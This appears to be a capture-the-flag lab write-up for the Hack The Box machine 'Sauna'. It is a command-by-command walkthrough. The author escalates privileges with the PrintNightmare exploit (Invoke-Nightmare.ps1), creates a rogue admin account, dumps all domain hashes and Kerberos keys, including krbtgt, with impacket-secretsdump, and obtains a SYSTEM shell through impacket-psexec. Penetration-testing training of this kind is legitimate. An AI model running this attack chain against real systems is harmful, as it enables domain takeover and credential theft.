CVE-2021-1675
a vulnerability classified as critical was found in microsoft windows (Operating System). Affected by this vulnerability is an unknown part of the component Print Spooler. As an impact it is known to affect confidentiality, integrity, and availability.
Low privileged users are able to add a printer, and specifically providing a malicious driver for that printer, in which case, results in escalation of privileges, gaining the system level access
Overview of CVE-2021-1675/CVE-2021-34527
The vulnerability takes advantage of the Windows-native service called Print Spooler that is enabled by default on all Windows machines (servers and endpoints)
*evil-winrm* ps c:\Users\FSmith\Documents> Get-Service Spooler
Status Name DisplayName
------ ---- -----------
Running Spooler Print SpoolerI can test for the Windows Spooler service locally, although there’s been many different sources that indicate the presence of it
exploit (printnightmare)
Invoke-Nightmare.ps1 is a PowerShell implementation of the PrintNightmare LPE exploit for CVE-2021-1675
Exploitation
*evil-winrm* ps c:\Users\FSmith\Documents> upload Invoke-Nightmare.ps1 C:\Users\FSmith\Documents\Invoke-Nightmare.ps1
info: Uploading Invoke-Nightmare.ps1 to C:\Users\FSmith\Documents\Invoke-Nightmare.ps1
data: 238080 bytes of 238080 bytes copied
info: Upload successful!
*evil-winrm* ps c:\Users\FSmith\Documents> . .\Invoke-Nightmare.ps1I first uploaded the exploit script to the target system using the existing WinRM session I also imported it into the current PS session
*evil-winrm* ps c:\Users\FSmith\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at c:\Users\FSmith\AppData\Local\Temp\nightmare.dll
[+] using pdriverpath = "c:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_9543832f82bb474f\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from c:\Users\FSmith\AppData\Local\Temp\nightmare.dllupon executing the exploit powershell cmdlet, a local admin user is created; adm1n:P@ssw0rd
┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ evil-winrm -i sauna.egotistical-bank.local -u adm1n -p 'P@ssw0rd'
Evil-WinRM shell v3.4
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\adm1n\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288Successfully WinRM to the target system as the newly created ad1min user
As the output shown above, the user is part of the administrators group
Hashdump
┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-secretsdump 'adm1n:P@ssw0rd@SAUNA.EGOTISTICAL-BANK.LOCAL' -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x6d261a4763682dbf58336ec3dc7ff268
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
EGOTISTICALBANK\SAUNA$:aes256-cts-hmac-sha1-96:169b40d92b9b50b70712649ec010a4941314a10e61443b9249bc483d94012825
EGOTISTICALBANK\SAUNA$:aes128-cts-hmac-sha1-96:5a9b17710de61c6181ca21a297276b0e
EGOTISTICALBANK\SAUNA$:des-cbc-md5:9bad4a8908fdd5d3
EGOTISTICALBANK\SAUNA$:plain_password_hex:0bf15d9433742c2773d5972b72d04f812ede58d233bc1cd4d9a31497a887029baff4a2c19bfb5931457377d25027d21e428500712821d8890413fe61d09c7cfbe45c5f115a14c00c04e99e6432813588506f68f90836dddf561b513478526cd0ee6066c0db0f51b731668d1fe3ddb33f8a44ee25037693b854ad4204065542a5a4334c6e86142e7ea0784379f6378cfd771e2f278d71b7e8c2db27c3f7b351e50e63d997f49addc1828c110b2df5a2673621e310e1f8ab1fa566e38eb369e97468b99f403cee6ceadb865be6817e737b238574d753e1267a3e4f7cc57fe5e10c92b884421c6759f958d3fd5fa3370c60
EGOTISTICALBANK\SAUNA$:aad3b435b51404eeaad3b435b51404ee:5dc91efb42d910e053e11dffa46bf5d6:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x2460a9de840f81ad5f31efc8b864e55672bd8c44
dpapi_userkey:0x466a52963a9bc1175c7b9109f3cae6bf1b46989e
[*] NL$KM
0000 87 2B 1B 92 A2 F4 CC 90 DF FF F7 A1 A4 50 61 C3 .+...........Pa.
0010 4A 11 6B B6 89 3D CD A0 E0 4D 40 61 A2 7F 79 68 J.k..=...M@a..yh
0020 9C CF BD 0C 8B F2 96 B9 74 42 A0 53 F4 09 32 0A ........tB.S..2.
0030 8F 86 0E 5F 5A BD ED 1A 84 0F 66 0E A1 52 BC 7B ..._Z.....f..R.{
NL$KM:872b1b92a2f4cc90dffff7a1a45061c34a116bb6893dcda0e04d4061a27f79689ccfbd0c8bf296b97442a053f409320a8f860e5f5abded1a840f660ea152bc7b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
adm1n:4105:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:5dc91efb42d910e053e11dffa46bf5d6:::
WIN-AVOBJSNQI4E$:4101:aad3b435b51404eeaad3b435b51404ee:f5d7c0e3775ca7a325a2d9ea1d6aa85c:::
WIN-ARGRI7MJOKU$:4102:aad3b435b51404eeaad3b435b51404ee:c8c3b17e8cbb1ad86660af0c61a221e4:::
WIN-EBZ40EV7HGQ$:4103:aad3b435b51404eeaad3b435b51404ee:a2d799f8f8037cb6d2ad9d5bd932068f:::
WIN-IK7ZYRL5NJL$:4104:aad3b435b51404eeaad3b435b51404ee:5768aa508c9322dfefd3d59ca4b58eb3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
adm1n:aes256-cts-hmac-sha1-96:d802ee1431bcec7be2b4ed46375227d48ff0d44b92a3a588400465046695dba9
adm1n:aes128-cts-hmac-sha1-96:51b6f3c5c9462ab307504e46e052494a
adm1n:des-cbc-md5:34a11a0e267a7354
SAUNA$:aes256-cts-hmac-sha1-96:169b40d92b9b50b70712649ec010a4941314a10e61443b9249bc483d94012825
SAUNA$:aes128-cts-hmac-sha1-96:5a9b17710de61c6181ca21a297276b0e
SAUNA$:des-cbc-md5:ef6d38977fea32d9
WIN-AVOBJSNQI4E$:aes256-cts-hmac-sha1-96:ae10bf959b90ebbeecd67b223b6974d235f8118dcd870e72fb25090577a86fd6
WIN-AVOBJSNQI4E$:aes128-cts-hmac-sha1-96:b5b6c8e3a72a3d8bdaedcf4e5e305d3d
WIN-AVOBJSNQI4E$:des-cbc-md5:2643d5f410e515fe
WIN-ARGRI7MJOKU$:aes256-cts-hmac-sha1-96:ebeb999cdaae3ebccdd641a8be90b75a915dfa8db22b78174e4e90b0849353df
WIN-ARGRI7MJOKU$:aes128-cts-hmac-sha1-96:e84073c311e90e0fa4dd96cfc1d94dcc
WIN-ARGRI7MJOKU$:des-cbc-md5:202f04a17c542513
WIN-EBZ40EV7HGQ$:aes256-cts-hmac-sha1-96:b86fb98b7f2cf65e1dd9cba8a1934d9879b1d217fb9455813b80609340950e5b
WIN-EBZ40EV7HGQ$:aes128-cts-hmac-sha1-96:bc32b1af2530c2ff8f21882655045f65
WIN-EBZ40EV7HGQ$:des-cbc-md5:a840cb4fc2734c04
WIN-IK7ZYRL5NJL$:aes256-cts-hmac-sha1-96:e217b9f35e815c1ade0ee4c4fe5b968b7875095aad86951d13eb1f98de1afea3
WIN-IK7ZYRL5NJL$:aes128-cts-hmac-sha1-96:729a5381641f29b1962bf7f05d179b8f
WIN-IK7ZYRL5NJL$:des-cbc-md5:cedc0d3e5dbab301
[*] Cleaning up... Domain Level Compromise
Shelldrop
──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-psexec 'adm1n:P@ssw0rd@SAUNA.EGOTISTICAL-BANK.LOCAL' -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file hiFKMvny.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service XuRq on 10.10.10.175.....
[*] Starting service XuRq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
SAUNA
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::17a
ipv6 address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
link-local ipv6 address . . . . . : fe80::64df:5bff:4879:1d8b%7
ipv4 address. . . . . . . . . . . : 10.10.10.175
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
10.10.10.2System Level Compromise